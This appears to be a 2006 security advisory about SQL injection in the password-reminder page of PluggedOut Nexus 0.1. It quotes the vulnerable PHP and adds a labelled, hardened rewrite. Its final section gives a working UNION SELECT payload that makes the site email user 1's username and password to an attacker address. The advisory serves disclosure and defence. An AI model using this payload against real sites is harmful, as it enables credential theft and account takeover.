pluggedoutSQL.txt

2006-03-03T00:00:00
ID PACKETSTORM:44331
Type packetstorm
Reporter Hamid Ebadi
Modified 2006-03-03T00:00:00

Description

                                        
                                            `PluggedOut Nexus SQL injection  
Nexus is an open source script you can run on your web  
server to give you a community based website  
where people can register, search each other's  
interests, and communicate with one another either  
through a private messaging system, or via chat  
requests and forums.  
Project : PluggedOut Nexus  
Version : 0.1  
Author : Jonathan Beckett  
Home : http://www.pluggedout.com  
  
Credit:  
The information has been provided by Hamid Ebadi.  
(Hamid Network Security Team): admin[AT]hamid[o]ir  
The original article can be found at:  
http://hamid.ir/security/  
  
Vulnerable Systems: PluggedOut Nexus 0.1  
  
http://localhost/Nexus/forgotten_password.php  
  
On this page, if you enter the private email address  
that you used while creating your account into the  
form, the server will send an email with your login  
details to that address.  
Input passed to the "email" parameter in  
"forgotten_password.php" isn't properly sanitised  
before being used in a SQL query. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
  
test:  
In the E-Mail Address form enter ' and press Send Request.  
You will be redirected to  
http://localhost/Nexus/site_problem.php and see:  
  
Problem with Nexus website  
A problem has occurred with the Nexus website - this  
was not your fault, and the administrators probably  
already know about it.  
  
  
Vulnerable Code: The following lines in  
"forgotten_password.php":  
---------------------------~=[Vulnerable Code]=~---------------------------  
if ($_POST["submit"]!=""){  
    $con = db_connect();  
    // The submitted address is concatenated straight into the query text:  
    // no escaping, no parameter binding.  
    $sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users WHERE cEMailPrivate='".$_POST["email"]."'";  
    $result = mysql_query($sql,$con);  
    if ($result!=false){  
        if (mysql_num_rows($result)>0){  
            $row = mysql_fetch_array($result);  
            $from = $site_admin_email;  
            // The recipient comes from the query result, so whatever row the  
            // manipulated query returns decides where the mail is sent.  
            $to = $row["cEMailPrivate"];  
            $subject = "Reminder Username/Password from ".$site_long_name."";  
            $body = "This email has been sent following a request for a reminder username/password in the ".$site_long_name." website.\n\n"  
                ."Your account details are as follows;\n"  
                ." Username : ".$row["cUsername"]."\n"  
                ." Password : ".$row["cPassword"]."\n\n"  
                ."If you did not request this reminder message, please contact the ".$site_long_name." administrator (".$admin_email.")\n";  
  
            send_email($from,$to,$subject,$body);  
        }  
    }  
}  
// (closing braces restored; the advisory excerpt ends after send_email)  
---------------------------~=[/Vulnerable Code]=~---------------------------  
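For comparison, here is a hardened rewrite of the same handler. This is an added example, not PluggedOut Nexus code; it assumes the same table and column names (nexus_users, cEMailPrivate, cUsername), that db_connect() returns a mysqli connection (the legacy mysql_* functions used above were removed in PHP 7), and that send_email() and the $site_* / $admin_email globals exist as in Nexus.

```php
<?php
// Added example, not PluggedOut Nexus code: a hardened version of the
// forgotten_password.php handler. Assumed: nexus_users table with columns
// cEMailPrivate and cUsername, db_connect() returning a mysqli connection,
// and Nexus's own send_email(), $site_long_name, $site_admin_email,
// $admin_email.

function lookup_user_by_email(mysqli $con, string $email): ?array
{
    // Reject anything that is not a syntactically valid address before it
    // reaches the database. A lone quote or a UNION payload fails here.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Parameterised query: the address is bound as data, so it can never
    // change the structure of the statement, whatever characters it holds.
    $stmt = $con->prepare(
        'SELECT cUsername, cEMailPrivate FROM nexus_users WHERE cEMailPrivate = ?'
    );
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->bind_result($username, $storedEmail);
    $found = $stmt->fetch() === true;
    $stmt->close();
    return $found ? ['cUsername' => $username, 'cEMailPrivate' => $storedEmail] : null;
}

if (isset($_POST['submit']) && $_POST['submit'] !== '') {
    $con = db_connect();
    $row = lookup_user_by_email($con, (string) ($_POST['email'] ?? ''));
    if ($row !== null) {
        // Never mail the stored password: the original discloses cPassword in
        // clear text, which also means passwords are stored in recoverable
        // form. Mail the username only; password recovery belongs in a
        // separate token-based reset flow.
        $to      = $row['cEMailPrivate'];
        $subject = 'Username reminder from ' . $site_long_name;
        $body    = "A username reminder was requested for this address on the "
                 . $site_long_name . " website.\n\n"
                 . " Username : " . $row['cUsername'] . "\n\n"
                 . "If you did not request this, contact " . $admin_email . "\n";
        send_email($site_admin_email, $to, $subject, $body);
    }
    // Respond identically whether or not the address exists, so the form
    // cannot be used to enumerate registered addresses.
    echo 'If that address is registered, a reminder has been sent.';
}
```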
  
  
exploit:  
  
Enter this payload in the E-Mail Address form  
(http://localhost/Nexus/forgotten_password.php):  
hamidnetworksecurityteam' union select  
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from  
nexus_users WHERE nUserId=1 and '1'='1  
  
ATTACKER@EMAIL.ADDRESS then receives an email containing the  
username and password for userID=1.  
  